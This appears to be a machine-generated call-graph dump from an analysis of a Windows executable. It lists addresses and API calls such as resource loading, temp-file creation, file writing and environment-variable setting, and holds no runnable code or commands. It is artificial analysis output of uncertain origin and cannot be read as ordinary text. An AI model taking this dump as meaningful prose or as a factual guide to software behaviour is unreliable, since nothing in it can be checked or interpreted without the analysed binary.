SetLastError 8546->9491 8548 401b03 8549 40a240 4 API calls 8548->8549 8550 401b0e 8549->8550 8551 40e560 3 API calls 8550->8551 8552 401b1a 8551->8552 8553 40ae67 2 API calls 8552->8553 8554 401b25 PathRenameExtensionW GetTempFileNameW 8553->8554 9492 40e520 GetLastError TlsGetValue SetLastError 8554->9492 8556 401b54 9493 40e520 GetLastError TlsGetValue SetLastError 8556->9493 8558 401b5c 8559 40a240 4 API calls 8558->8559 8560 401b67 8559->8560 8561 40e560 3 API calls 8560->8561 8562 401b73 8561->8562 9494 40a200 HeapFree 8562->9494 8564 401b7c 8565 40e5f0 RtlFreeHeap 8564->8565 8566 401b89 8565->8566 8567 40e5f0 RtlFreeHeap 8566->8567 8568 401b92 8567->8568 8569 40e5f0 RtlFreeHeap 8568->8569 8570 401b9b 8569->8570 8571 40469c 8570->8571 8572 40e660 21 API calls 8571->8572 8576 4046a9 8572->8576 8573 40472a 9501 40e520 GetLastError TlsGetValue SetLastError 8573->9501 8574 40e520 GetLastError TlsGetValue SetLastError 8574->8576 8576->8573 8576->8574 8578 405dc0 3 API calls 8576->8578 8585 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8576->8585 8590 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8576->8590 8577 404730 8579 403539 98 API calls 8577->8579 8578->8576 8580 404746 8579->8580 8581 40e560 3 API calls 8580->8581 8582 404750 8581->8582 9502 40afda 8582->9502 8585->8576 8586 40e5f0 RtlFreeHeap 8587 404764 8586->8587 8588 40e5f0 RtlFreeHeap 8587->8588 8589 40476d 8588->8589 8591 40e5f0 RtlFreeHeap 8589->8591 8590->8576 8592 404522 8591->8592 8593 40e520 GetLastError TlsGetValue SetLastError 8592->8593 8593->7821 8595 40e660 21 API calls 8594->8595 8596 403543 8595->8596 8597 4051a0 3 API calls 8596->8597 8598 40354c 8597->8598 8599 405060 2 API calls 8598->8599 8600 403558 8599->8600 8601 403563 8600->8601 8602 403587 8600->8602 9507 40e520 GetLastError TlsGetValue SetLastError 8601->9507 8603 403591 8602->8603 8604 4035b4 8602->8604 9515 40e520 GetLastError TlsGetValue SetLastError 8603->9515 8607 4035e7 8604->8607 8608 4035be 8604->8608 8611 4035f1 8607->8611 8612 40361a 8607->8612 9516 40e520 GetLastError TlsGetValue SetLastError 8608->9516 8609 403569 9508 40e520 GetLastError TlsGetValue SetLastError 8609->9508 8610 40359d 8615 40e6c0 4 API calls 8610->8615 9534 40e520 GetLastError TlsGetValue SetLastError 8611->9534 8619 403624 8612->8619 8620 40364d 8612->8620 8621 4035a5 8615->8621 8617 4035c4 9517 40e520 GetLastError TlsGetValue SetLastError 8617->9517 8618 403571 9509 40ae75 8618->9509 9536 40e520 GetLastError TlsGetValue SetLastError 8619->9536 8623 403680 8620->8623 8624 403657 8620->8624 8630 40e560 3 API calls 8621->8630 8622 4035f7 9535 40e520 GetLastError TlsGetValue SetLastError 8622->9535 8628 4036b3 8623->8628 8629 40368a 8623->8629 9538 40e520 GetLastError TlsGetValue SetLastError 8624->9538 8640 4036e6 8628->8640 8641 4036bd 8628->8641 9540 40e520 GetLastError TlsGetValue SetLastError 8629->9540 8637 403582 8630->8637 8633 4035cc 9518 40aeba 8633->9518 8634 403578 8643 40e560 3 API calls 8634->8643 8635 40362a 9537 40e520 GetLastError TlsGetValue SetLastError 8635->9537 9505 40e520 GetLastError TlsGetValue SetLastError 8637->9505 8638 4035ff 8649 40aeba 17 API calls 8638->8649 8639 40365d 9539 40e520 GetLastError TlsGetValue SetLastError 8639->9539 8647 4036f0 8640->8647 8648 403719 8640->8648 9542 40e520 GetLastError TlsGetValue SetLastError 8641->9542 8643->8637 8645 403632 8653 40aeba 17 API calls 8645->8653 8646 403690 9541 40e520 GetLastError TlsGetValue SetLastError 8646->9541 9544 40e520 GetLastError TlsGetValue SetLastError 8647->9544 8660 403723 8648->8660 8661 403749 8648->8661 8657 40360b 8649->8657 8663 40363e 8653->8663 8669 40e560 3 API calls 8657->8669 8658 403665 8670 40aeba 17 API calls 8658->8670 8659 4036c3 9543 40e520 GetLastError TlsGetValue SetLastError 8659->9543 9546 40e520 GetLastError TlsGetValue SetLastError 8660->9546 8667 4037a1 8661->8667 8668 403753 8661->8668 8662 40e560 3 API calls 8721 4035e2 8662->8721 8674 40e560 3 API calls 8663->8674 8664 4037cb 8675 40e6c0 4 API calls 8664->8675 8665 403698 8676 40aeba 17 API calls 8665->8676 8666 4036f6 9545 40e520 GetLastError TlsGetValue SetLastError 8666->9545 9576 40e520 GetLastError TlsGetValue SetLastError 8667->9576 9548 40e520 GetLastError TlsGetValue SetLastError 8668->9548 8669->8721 8680 403671 8670->8680 8673 403729 9547 40e520 GetLastError TlsGetValue SetLastError 8673->9547 8674->8721 8683 4037d3 8675->8683 8684 4036a4 8676->8684 8688 40e560 3 API calls 8680->8688 8681 4036cb 8689 40aeba 17 API calls 8681->8689 9506 405170 TlsGetValue 8683->9506 8693 40e560 3 API calls 8684->8693 8685 4036fe 8694 40aeba 17 API calls 8685->8694 8686 403759 9549 40e520 GetLastError TlsGetValue SetLastError 8686->9549 8687 4037a7 9577 40e520 GetLastError TlsGetValue SetLastError 8687->9577 8688->8721 8690 4036d7 8689->8690 8697 40e560 3 API calls 8690->8697 8691 403731 8698 40aeba 17 API calls 8691->8698 8693->8721 8700 40370a 8694->8700 8697->8721 8703 40373d 8698->8703 8699 4037da 8708 40e5f0 RtlFreeHeap 8699->8708 8704 40e560 3 API calls 8700->8704 8701 403761 9550 409355 8701->9550 8702 4037af 8706 40ae75 5 API calls 8702->8706 8707 40e560 3 API calls 8703->8707 8704->8721 8710 4037b6 8706->8710 8707->8721 8712 4037f2 8708->8712 8711 40e560 3 API calls 8710->8711 8711->8637 8715 40e5f0 RtlFreeHeap 8712->8715 8713 40e560 3 API calls 8714 40377c 8713->8714 8717 403795 8714->8717 8718 403789 8714->8718 8716 4037fa 8715->8716 8716->7824 8720 401fba 36 API calls 8717->8720 9573 4056d8 8718->9573 8720->8721 8721->8637 8722->7828 8723->7830 8725 40e660 21 API calls 8724->8725 8726 402bb0 8725->8726 8727 4051a0 3 API calls 8726->8727 8728 402bb9 8727->8728 8729 405060 2 API calls 8728->8729 8730 402bc5 8729->8730 8731 40a220 RtlAllocateHeap 8730->8731 8732 402bcf GetShortPathNameW 8731->8732 9587 40e520 GetLastError TlsGetValue SetLastError 8732->9587 8734 402beb 9588 40e520 GetLastError TlsGetValue SetLastError 8734->9588 8736 402bf3 8737 40a290 5 API calls 8736->8737 8738 402c03 8737->8738 8739 40e560 3 API calls 8738->8739 8740 402c0d 8739->8740 9589 40a200 HeapFree 8740->9589 8742 402c16 9590 40e520 GetLastError TlsGetValue SetLastError 8742->9590 8744 402c20 8745 40e6c0 4 API calls 8744->8745 8746 402c28 8745->8746 9591 405170 TlsGetValue 8746->9591 8748 402c2f 8749 40e5f0 RtlFreeHeap 8748->8749 8750 402c46 8749->8750 8751 40e5f0 RtlFreeHeap 8750->8751 8752 402c4f 8751->8752 8753 40e720 TlsGetValue 8752->8753 8753->7834 8754->7836 8756 404594 8755->8756 8757 4099ac SetEnvironmentVariableW 8755->8757 8756->7839 8757->8756 8759->7842 8761 403807 8760->8761 8761->8761 8762 40e660 21 API calls 8761->8762 8781 403819 8762->8781 8763 40389a 9592 40e520 GetLastError TlsGetValue SetLastError 8763->9592 8765 4038a0 9593 40e520 GetLastError TlsGetValue SetLastError 8765->9593 8767 4038a8 9594 40e520 GetLastError TlsGetValue SetLastError 8767->9594 8768 405dc0 3 API calls 8768->8781 8770 4038b0 9595 40e520 GetLastError TlsGetValue SetLastError 8770->9595 8771 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8771->8781 8773 4038b8 8775 40d780 8 API calls 8773->8775 8774 40e520 GetLastError TlsGetValue SetLastError 8774->8781 8776 4038ca 8775->8776 9596 405182 TlsGetValue 8776->9596 8777 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8777->8781 8779 4038cf 8780 405eb0 6 API calls 8779->8780 8782 4038d7 8780->8782 8781->8763 8781->8768 8781->8771 8781->8774 8781->8777 8783 40e560 3 API calls 8782->8783 8784 4038e1 8783->8784 9597 40e520 GetLastError TlsGetValue SetLastError 8784->9597 8786 4038e7 9598 40e520 GetLastError TlsGetValue SetLastError 8786->9598 8788 4038ef 9599 40e520 GetLastError TlsGetValue SetLastError 8788->9599 8790 4038f7 9600 40e520 GetLastError TlsGetValue SetLastError 8790->9600 8792 4038ff 8793 40d780 8 API calls 8792->8793 8794 403911 8793->8794 9601 405182 TlsGetValue 8794->9601 8796 403916 8797 405eb0 6 API calls 8796->8797 8798 40391e 8797->8798 8799 40e560 3 API calls 8798->8799 8800 403928 8799->8800 9602 40e520 GetLastError TlsGetValue SetLastError 8800->9602 8802 40392e 9603 40e520 GetLastError TlsGetValue SetLastError 8802->9603 8804 403936 9604 40e520 GetLastError TlsGetValue SetLastError 8804->9604 8806 40393e 9605 40e520 GetLastError TlsGetValue SetLastError 8806->9605 8808 403946 8809 40d780 8 API calls 8808->8809 8810 403956 8809->8810 9606 405182 TlsGetValue 8810->9606 8812 40395b 8813 405eb0 6 API calls 8812->8813 8814 403963 8813->8814 8815 40e560 3 API calls 8814->8815 8816 40396d 8815->8816 9607 40e520 GetLastError TlsGetValue SetLastError 8816->9607 8818 403973 9608 40e520 GetLastError TlsGetValue SetLastError 8818->9608 8820 40397b 9609 40e520 GetLastError TlsGetValue SetLastError 8820->9609 8822 403983 9610 40e520 GetLastError TlsGetValue SetLastError 8822->9610 8824 40398b 8825 40d780 8 API calls 8824->8825 8826 40399b 8825->8826 9611 405182 TlsGetValue 8826->9611 8828 4039a0 8829 405eb0 6 API calls 8828->8829 8830 4039a8 8829->8830 8831 40e560 3 API calls 8830->8831 8832 4039b2 8831->8832 9612 40e520 GetLastError TlsGetValue SetLastError 8832->9612 8834 4039b8 9613 40e520 GetLastError TlsGetValue SetLastError 8834->9613 8836 4039c0 9614 40e520 GetLastError TlsGetValue SetLastError 8836->9614 8838 4039c8 9615 40e520 GetLastError TlsGetValue SetLastError 8838->9615 8840 4039d0 8841 40d780 8 API calls 8840->8841 8842 4039e0 8841->8842 9616 405182 TlsGetValue 8842->9616 8844 4039e5 8845 405eb0 6 API calls 8844->8845 8846 4039ed 8845->8846 8847 40e560 3 API calls 8846->8847 8848 4039f7 8847->8848 9617 40e520 GetLastError TlsGetValue SetLastError 8848->9617 8850 4039fd 9618 403e37 8850->9618 8853 4051a0 3 API calls 8854 403a12 8853->8854 9659 40e520 GetLastError TlsGetValue SetLastError 8854->9659 8856 403a18 8857 403e37 84 API calls 8856->8857 8858 403a28 8857->8858 8859 40e560 3 API calls 8858->8859 8860 403a34 8859->8860 9660 40e520 GetLastError TlsGetValue SetLastError 8860->9660 8862 403a3a 8863 403e37 84 API calls 8862->8863 8864 403a4a 8863->8864 8865 40e560 3 API calls 8864->8865 8866 403a54 8865->8866 9661 40e520 GetLastError TlsGetValue SetLastError 8866->9661 8868 403a5a 8869 403e37 84 API calls 8868->8869 8870 403a6a 8869->8870 8871 40e560 3 API calls 8870->8871 8872 403a74 8871->8872 9662 40e520 GetLastError TlsGetValue SetLastError 8872->9662 8874 403a7a 8875 403e37 84 API calls 8874->8875 8876 403a8a 8875->8876 8877 40e560 3 API calls 8876->8877 8878 403a94 8877->8878 9663 40e520 GetLastError TlsGetValue SetLastError 8878->9663 8880 403a9a 9664 40e520 GetLastError TlsGetValue SetLastError 8880->9664 8882 403aa2 9665 40e520 GetLastError TlsGetValue SetLastError 8882->9665 8884 403aaa 8885 402ba6 43 API calls 8884->8885 8886 403ab7 8885->8886 9666 40e720 TlsGetValue 8886->9666 8888 403abc 9667 405182 TlsGetValue 8888->9667 8890 403acb 9668 406650 8890->9668 8893 40e560 3 API calls 8894 403ade 8893->8894 9671 40e520 GetLastError TlsGetValue SetLastError 8894->9671 8896 403ae4 9672 40e520 GetLastError TlsGetValue SetLastError 8896->9672 8898 403aec 9673 40e520 GetLastError TlsGetValue SetLastError 8898->9673 8900 403af4 8901 402ba6 43 API calls 8900->8901 8902 403b01 8901->8902 9674 40e720 TlsGetValue 8902->9674 8904 403b06 9675 405182 TlsGetValue 8904->9675 8906 403b15 8907 406650 13 API calls 8906->8907 8908 403b1e 8907->8908 8909 40e560 3 API calls 8908->8909 8910 403b28 8909->8910 9676 40e520 GetLastError TlsGetValue SetLastError 8910->9676 8912 403b2e 9677 40e520 GetLastError TlsGetValue SetLastError 8912->9677 8914 403b3a 8915 40e6c0 4 API calls 8914->8915 8916 403b42 8915->8916 8917 40e6c0 4 API calls 8916->8917 8918 403b4d 8917->8918 8919 40e6c0 4 API calls 8918->8919 8920 403b57 8919->8920 8921 40e6c0 4 API calls 8920->8921 8922 403b61 8921->8922 8923 40e6c0 4 API calls 8922->8923 8924 403b6b 8923->8924 9678 40e720 TlsGetValue 8924->9678 8926 403b70 9679 405182 TlsGetValue 8926->9679 8928 403b7b 9680 4023b8 8928->9680 8931 4051a0 3 API calls 8932 403b89 8931->8932 8933 40e5f0 RtlFreeHeap 8932->8933 8934 403b94 8933->8934 8935 40e5f0 RtlFreeHeap 8934->8935 8936 403b9d 8935->8936 8937 40e5f0 RtlFreeHeap 8936->8937 8938 403ba6 8937->8938 8939 40e5f0 RtlFreeHeap 8938->8939 8940 403baf 8939->8940 8941 40e5f0 RtlFreeHeap 8940->8941 8942 403bb8 8941->8942 8943 40e5f0 RtlFreeHeap 8942->8943 8944 403bc1 8943->8944 8945 40e5f0 RtlFreeHeap 8944->8945 8946 403bca 8945->8946 8947 40e5f0 RtlFreeHeap 8946->8947 8948 403bd3 8947->8948 8949 40e5f0 RtlFreeHeap 8948->8949 8950 403bdc 8949->8950 8951 40e5f0 RtlFreeHeap 8950->8951 8952 403be5 8951->8952 8953 40e520 GetLastError TlsGetValue SetLastError 8952->8953 8953->7852 8955 40e660 21 API calls 8954->8955 8956 401e70 8955->8956 8957 4051a0 3 API calls 8956->8957 8958 401e79 8957->8958 9888 40e520 GetLastError TlsGetValue SetLastError 8958->9888 8960 401e7f 9889 40e520 GetLastError TlsGetValue SetLastError 8960->9889 8962 401e87 8963 409698 7 API calls 8962->8963 8964 401e8e 8963->8964 8965 40e560 3 API calls 8964->8965 8966 401e98 PathQuoteSpacesW 8965->8966 8967 401ef1 8966->8967 8968 401ea8 8966->8968 9956 40e520 GetLastError TlsGetValue SetLastError 8967->9956 9890 40e520 GetLastError TlsGetValue SetLastError 8968->9890 8971 401eae 9891 40249d 8971->9891 8972 401efa 8974 40e6c0 4 API calls 8972->8974 8976 401f02 8974->8976 8978 40e560 3 API calls 8976->8978 8977 40e560 3 API calls 8997 401eef 8978->8997 8983 401f16 8985 40e6c0 4 API calls 8983->8985 8987 401f1e 8985->8987 9958 405170 TlsGetValue 8987->9958 8992 401f25 8993 40e5f0 RtlFreeHeap 8992->8993 8996 401f3c 8993->8996 8998 40e5f0 RtlFreeHeap 8996->8998 9957 40e520 GetLastError TlsGetValue SetLastError 8997->9957 8999 401f45 8998->8999 8999->7855 9001 40e660 21 API calls 9000->9001 9002 403c91 9001->9002 9003 405060 2 API calls 9002->9003 9004 403c9d 9003->9004 9005 405060 2 API calls 9004->9005 9006 403caa 9005->9006 9007 405060 2 API calls 9006->9007 9008 403cb7 9007->9008 9009 405060 2 API calls 9008->9009 9010 403cc4 9009->9010 9989 40e520 GetLastError TlsGetValue SetLastError 9010->9989 9012 403cd0 9013 40e6c0 4 API calls 9012->9013 9014 403cd8 9013->9014 9015 40e560 3 API calls 9014->9015 9016 403ce2 PathQuoteSpacesW 9015->9016 9990 40e520 GetLastError TlsGetValue SetLastError 9016->9990 9018 403cf5 9019 40e6c0 4 API calls 9018->9019 9020 403cfd 9019->9020 9085 4054b1 EnterCriticalSection 9084->9085 9086 404601 9084->9086 9087 4054c7 9085->9087 9093 4054f7 9085->9093 9086->7862 9089 4054c8 WaitForSingleObject 9087->9089 9087->9093 9088 40e1f2 HeapAlloc 9091 405511 LeaveCriticalSection 9088->9091 9089->9087 9090 4054d8 CloseHandle 9089->9090 9092 40e1b2 HeapFree 9090->9092 9091->9086 9092->9087 9093->9088 9095 40e660 21 API calls 9094->9095 9096 402c63 9095->9096 9097 405060 2 API calls 9096->9097 9098 402c6f 9097->9098 9099 402c9c 9098->9099 10091 40e520 GetLastError TlsGetValue SetLastError 9098->10091 10093 40e520 GetLastError TlsGetValue SetLastError 9099->10093 9102 402ca2 10094 40e520 GetLastError TlsGetValue SetLastError 9102->10094 9103 402c7e 10092 40e520 GetLastError TlsGetValue SetLastError 9103->10092 9106 402caa 10095 40e520 GetLastError TlsGetValue SetLastError 9106->10095 9107 402c86 9109 40a240 4 API calls 9107->9109 9111 402c92 9109->9111 9110 402cb2 10096 40e520 GetLastError TlsGetValue SetLastError 9110->10096 9112 40e560 3 API calls 9111->9112 9112->9099 9114 402cba 9115 40d780 8 API calls 9114->9115 9116 402cca 9115->9116 10097 405182 TlsGetValue 9116->10097 9118 402ccf 9119 405eb0 6 API calls 9118->9119 9120 402cd7 9119->9120 9121 40e560 3 API calls 9120->9121 9122 402ce1 FindResourceW 9121->9122 9123 402d04 9122->9123 9128 402db0 9122->9128 9124 402664 26 API calls 9123->9124 9125 402d13 9124->9125 9127 402dd8 9128->9127 9129 402dc8 9128->9129 9130 402ddf 9128->9130 9224 40e780 9174->9224 9176 40324e 9176->8277 9178 402b73 9177->9178 9178->9178 9179 40e660 21 API calls 9178->9179 9180 402b85 GetNativeSystemInfo 9179->9180 9181 402b98 9180->9181 9181->8281 9181->8282 9183 4055a1 9182->9183 9187 403269 9182->9187 9183->9187 9227 40552c memset GetModuleHandleW 9183->9227 9186 4055df GetVersionExW 9186->9187 9187->8282 9188->8290 9189->8294 9191 40e900 3 API calls 9190->9191 9192 40329b 9191->9192 9192->8299 9193->8304 9194->8319 9195->8335 9230 40db18 EnterCriticalSection 9196->9230 9198 40b455 9199 40b4ee 9198->9199 9200 40b45f CreateFileW 9198->9200 9199->8346 9201 40b480 9200->9201 9203 40b4a0 9200->9203 9201->9203 9204 40b48d HeapAlloc 9201->9204 9205 40b4e5 9203->9205 9240 40da8a EnterCriticalSection 9203->9240 9204->9203 9205->8346 9207 40b069 9206->9207 9208 40b05a 9206->9208 9251 40dad9 EnterCriticalSection 9207->9251 9255 40e075 9208->9255 9213 40b0ad 9213->8347 9214 40b099 FindCloseChangeNotification 9216 40da8a 4 API calls 9214->9216 9216->9213 9217 40b088 HeapFree 9217->9214 9218->8355 9219->8357 9220->8289 9221->8293 9222->8306 9223->8314 9225 40e7c7 9224->9225 9226 40e78a wcslen RtlAllocateHeap 9224->9226 9225->9176 9226->9225 9228 405554 GetProcAddress 9227->9228 9229 405564 9227->9229 9228->9229 9229->9186 9229->9187 9231 40db32 9230->9231 9232 40db47 9230->9232 9235 40e1f2 HeapAlloc 9231->9235 9233 40db6c 9232->9233 9234 40db4c HeapReAlloc 9232->9234 9237 40db81 HeapAlloc 9233->9237 9238 40db75 9233->9238 9234->9233 9236 40db41 9235->9236 9239 40db9d LeaveCriticalSection 9236->9239 9237->9238 9238->9239 9239->9198 9241 40dac1 9240->9241 9242 40daa2 9240->9242 9248 40e1b2 9241->9248 9242->9241 9243 40daa7 9242->9243 9245 40dab0 memset 9243->9245 9246 40dacd LeaveCriticalSection 9243->9246 9245->9246 9246->9205 9247 40dacb 9247->9246 9249 40e1c3 HeapFree 9248->9249 9249->9247 9252 40daf2 9251->9252 9253 40dafd LeaveCriticalSection 9251->9253 9252->9253 9254 40b076 9253->9254 9254->9213 9254->9214 9261 40b0c0 9254->9261 9256 40e082 9255->9256 9257 40b065 9255->9257 9264 40e19b EnterCriticalSection 9256->9264 9257->8347 9260 40e088 9260->9257 9265 40e144 9260->9265 9262 40b0d4 WriteFile 9261->9262 9263 40b0fc 9261->9263 9262->9217 9263->9217 9264->9260 9267 40e150 9265->9267 9266 40e194 9266->9260 9267->9266 9268 40e18a LeaveCriticalSection 9267->9268 9268->9266 9270 40e660 21 API calls 9269->9270 9271 40266d LoadResource SizeofResource 9270->9271 9272 40a220 RtlAllocateHeap 9271->9272 9273 40269a 9272->9273 9286 40a300 memcpy 9273->9286 9275 4026b1 FreeResource 9276 4026c1 9275->9276 9277 40477d 9276->9277 9287 40a1e0 9277->9287 9279 404786 9279->8378 9281 40a228 RtlAllocateHeap 9280->9281 9282 40a23a 9280->9282 9281->8382 9282->8382 9290 40ee80 9283->9290 9285 402ed0 9285->8386 9286->9275 9288 40a1e8 HeapSize 9287->9288 9289 40a1fa 9287->9289 9288->9279 9289->9279 9291 40ee98 __fprintf_l 9290->9291 9293 40ef4a __fprintf_l 9291->9293 9294 40eff0 9291->9294 9293->9285 9295 40fa52 9294->9295 9299 40f000 __fprintf_l 9294->9299 9295->9291 9296 40f5d7 9300 40f644 __fprintf_l 9296->9300 9301 410b90 9296->9301 9298 40f4ef memcpy 9298->9299 9299->9295 9299->9296 9299->9298 9300->9291 9302 410ba4 9301->9302 9303 410c12 memcpy 9302->9303 9304 410bec memcpy 9302->9304 9306 410bbf 9302->9306 9307 410c39 memcpy 9303->9307 9308 410c58 9303->9308 9304->9300 9306->9300 9307->9300 9308->9300 9309->8396 9310->8400 9311->8404 9312->8407 9314 40a2a9 9313->9314 9315 40a299 9313->9315 9317 40e900 3 API calls 9314->9317 9417 40a240 9315->9417 9320 40a2bf 9317->9320 9318 40a2a6 9318->8412 9423 40ea90 TlsGetValue 9320->9423 9321 40a2e8 9321->8412 9322->8416 9424 405f90 9323->9424 9325 4021bd 9325->8421 9326->8425 9327->8427 9328->8429 9329->8431 9330->8435 9331->8441 9332->8443 9333->8445 9334->8447 9336 40590f 9335->9336 9343 405801 9335->9343 9434 40e9e0 TlsGetValue 9336->9434 9338 405918 9338->8449 9339 405886 9341 40e880 TlsGetValue 9339->9341 9340 405850 wcsncmp 9340->9343 9342 4058c7 9341->9342 9344 4058e9 9342->9344 9433 40e8d0 TlsGetValue 9342->9433 9343->9339 9343->9340 9346 40e900 3 API calls 9344->9346 9348 4058f0 9346->9348 9347 4058d7 memmove 9347->9344 9349 405901 9348->9349 9350 4058f6 wcsncpy 9348->9350 9349->8449 9350->9349 9351->8451 9352->8453 9353->8455 9354->8459 9355->8461 9435 408e58 9356->9435 9358 408f81 9359 408e58 3 API calls 9358->9359 9360 408f90 9359->9360 9361 408e58 3 API calls 9360->9361 9362 408fa3 9361->9362 9363 408fb0 GetStockObject 9362->9363 9364 408fbd LoadIconW LoadCursorW RegisterClassExW 9362->9364 9363->9364 9439 4094d1 GetForegroundWindow 9364->9439 9369 409047 IsWindowEnabled 9370 40906b 9369->9370 9371 409052 EnableWindow 9369->9371 9372 4094d1 3 API calls 9370->9372 9371->9370 9373 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9372->9373 9374 4092ba 9373->9374 9375 4090cb SetWindowLongW CreateWindowExW SendMessageW 9373->9375 9376 4092cd 9374->9376 9453 40e9e0 TlsGetValue 9374->9453 9377 409125 9375->9377 9378 409128 CreateWindowExW SendMessageW SetFocus 9375->9378 9454 408e9a 9376->9454 9377->9378 9380 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9378->9380 9381 40917b SendMessageW wcslen wcslen SendMessageW 9378->9381 9384 40926a 9380->9384 9381->9380 9386 409273 9384->9386 9387 40922e GetMessageW 9384->9387 9385 408e9a HeapFree 9388 4092df 9385->9388 9390 409277 DestroyAcceleratorTable 9386->9390 9391 40927e 9386->9391 9387->9386 9389 409243 TranslateAcceleratorW 9387->9389 9392 408e9a HeapFree 9388->9392 9389->9384 9393 409254 TranslateMessage DispatchMessageW 9389->9393 9390->9391 9391->9374 9394 409285 wcslen 9391->9394 9395 4092e5 9392->9395 9393->9384 9396 40e900 3 API calls 9394->9396 9395->8463 9397 40929c wcscpy HeapFree 9396->9397 9397->9374 9398->8470 9399->8472 9400->8474 9401->8476 9402->8480 9403->8487 9404->8489 9405->8491 9406->8495 9407->8497 9409 4094d1 3 API calls 9408->9409 9410 408e2d 9409->9410 9411 409588 16 API calls 9410->9411 9412 408e36 MessageBoxW 9411->9412 9413 409588 16 API calls 9412->9413 9414 40234b 9413->9414 9414->8500 9415->8397 9416->8405 9418 40a24d 9417->9418 9419 40e900 3 API calls 9418->9419 9420 40a26b 9419->9420 9421 40a271 memcpy 9420->9421 9422 40a27f 9420->9422 9421->9422 9422->9318 9423->9321 9426 405fa1 9424->9426 9425 40e880 TlsGetValue 9427 406014 9425->9427 9426->9425 9426->9426 9428 40e900 3 API calls 9427->9428 9429 406022 9428->9429 9431 406032 9429->9431 9432 40ea10 TlsGetValue 9429->9432 9431->9325 9432->9431 9433->9347 9434->9338 9436 408e60 wcslen HeapAlloc 9435->9436 9437 408e96 9435->9437 9436->9437 9438 408e86 wcscpy 9436->9438 9437->9358 9438->9358 9440 409032 9439->9440 9441 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9439->9441 9442 409588 9440->9442 9441->9440 9443 409592 EnumWindows 9442->9443 9451 4095dd 9442->9451 9444 4095af 9443->9444 9449 40903e 9443->9449 9457 409507 GetWindowThreadProcessId GetCurrentThreadId 9443->9457 9446 4095b1 GetCurrentThreadId 9444->9446 9447 4095c4 SetWindowPos 9444->9447 9444->9449 9445 4095ea GetCurrentThreadId 9445->9451 9446->9444 9447->9444 9448 409600 EnableWindow 9448->9451 9449->9369 9449->9370 9450 409611 SetWindowPos 9450->9451 9451->9445 9451->9448 9451->9449 9451->9450 9452 40e1b2 HeapFree 9451->9452 9452->9451 9453->9376 9455 408ea1 HeapFree 9454->9455 9456 408eb3 9454->9456 9455->9456 9456->9385 9458 409525 IsWindowVisible 9457->9458 9459 40957f 9457->9459 9458->9459 9460 409530 9458->9460 9461 40e1f2 HeapAlloc 9460->9461 9462 40953c GetCurrentThreadId GetWindowLongW 9461->9462 9463 40955a 9462->9463 9464 40955e GetForegroundWindow 9462->9464 9463->9464 9464->9459 9465 409568 IsWindowEnabled 9464->9465 9465->9459 9466 409573 EnableWindow 9465->9466 9466->9459 9467->8509 9468->8512 9470 40e900 3 API calls 9469->9470 9471 40ade9 GetTempPathW LoadLibraryW 9470->9471 9472 40ae24 9471->9472 9473 40ae06 GetProcAddress 9471->9473 9495 40ea90 TlsGetValue 9472->9495 9474 40ae16 GetLongPathNameW 9473->9474 9475 40ae1d FreeLibrary 9473->9475 9474->9475 9475->9472 9477 401a1e 9477->8517 9478->8520 9479->8524 9496 40ae39 9480->9496 9483 40ad45 9484 40ad54 wcsncpy wcslen 9483->9484 9485 401a7b GetTempFileNameW 9483->9485 9486 40ad88 CreateDirectoryW 9484->9486 9488 40e520 GetLastError TlsGetValue SetLastError 9485->9488 9486->9485 9488->8534 9489->8536 9490->8546 9491->8548 9492->8556 9493->8558 9494->8564 9495->9477 9497 40ae40 9496->9497 9498 401a70 9496->9498 9499 40ae56 DeleteFileW 9497->9499 9500 40ae47 SetFileAttributesW 9497->9500 9498->9483 9499->9498 9500->9499 9501->8577 9503 40afe1 SetCurrentDirectoryW 9502->9503 9504 404759 9502->9504 9503->9504 9504->8586 9505->8664 9506->8699 9507->8609 9508->8618 9510 40e900 3 API calls 9509->9510 9511 40ae87 GetCurrentDirectoryW 9510->9511 9512 40ae97 9511->9512 9578 40ea90 TlsGetValue 9512->9578 9514 40aeae 9514->8634 9515->8610 9516->8617 9517->8633 9519 40e900 3 API calls 9518->9519 9520 40aecf 9519->9520 9521 40aede LoadLibraryW 9520->9521 9530 40af69 9520->9530 9523 40af4b 9521->9523 9524 40aeef GetProcAddress 9521->9524 9522 40af9b 9585 40ea90 TlsGetValue 9522->9585 9579 40afec SHGetFolderLocation 9523->9579 9525 40af40 FreeLibrary 9524->9525 9526 40af04 9524->9526 9525->9522 9525->9523 9526->9525 9533 40af16 wcscpy wcscat wcslen CoTaskMemFree 9526->9533 9530->9522 9531 40afec 4 API calls 9530->9531 9531->9522 9532 4035d8 9532->8662 9533->9525 9534->8622 9535->8638 9536->8635 9537->8645 9538->8639 9539->8658 9540->8646 9541->8665 9542->8659 9543->8681 9544->8666 9545->8685 9546->8673 9547->8691 9548->8686 9549->8701 9551 409368 CoInitialize 9550->9551 9552 409379 memset LoadLibraryW 9550->9552 9551->9552 9553 4093a3 GetProcAddress GetProcAddress 9552->9553 9554 4094ab 9552->9554 9555 4093d2 wcsncpy wcslen 9553->9555 9556 4093cd 9553->9556 9557 40e900 3 API calls 9554->9557 9558 409401 9555->9558 9556->9555 9559 4094b8 9557->9559 9560 4094d1 3 API calls 9558->9560 9586 40ea90 TlsGetValue 9559->9586 9561 40941f 9560->9561 9564 409588 16 API calls 9561->9564 9563 403772 9563->8713 9565 409442 9564->9565 9566 409588 16 API calls 9565->9566 9567 409457 9566->9567 9568 40949f FreeLibrary 9567->9568 9569 40e900 3 API calls 9567->9569 9568->9554 9568->9559 9570 409468 CoTaskMemFree wcslen 9569->9570 9570->9568 9572 409493 9570->9572 9572->9568 9574 4056e1 timeBeginPeriod 9573->9574 9575 4056f3 Sleep 9573->9575 9574->9575 9576->8687 9577->8702 9578->9514 9580 40b00b SHGetPathFromIDListW 9579->9580 9581 40af53 wcscat wcslen 9579->9581 9582 40b035 CoTaskMemFree 9580->9582 9583 40b019 wcslen 9580->9583 9581->9522 9582->9581 9583->9582 9584 40b026 9583->9584 9584->9582 9585->9532 9586->9563 9587->8734 9588->8736 9589->8742 9590->8744 9591->8748 9592->8765 9593->8767 9594->8770 9595->8773 9596->8779 9597->8786 9598->8788 9599->8790 9600->8792 9601->8796 9602->8802 9603->8804 9604->8806 9605->8808 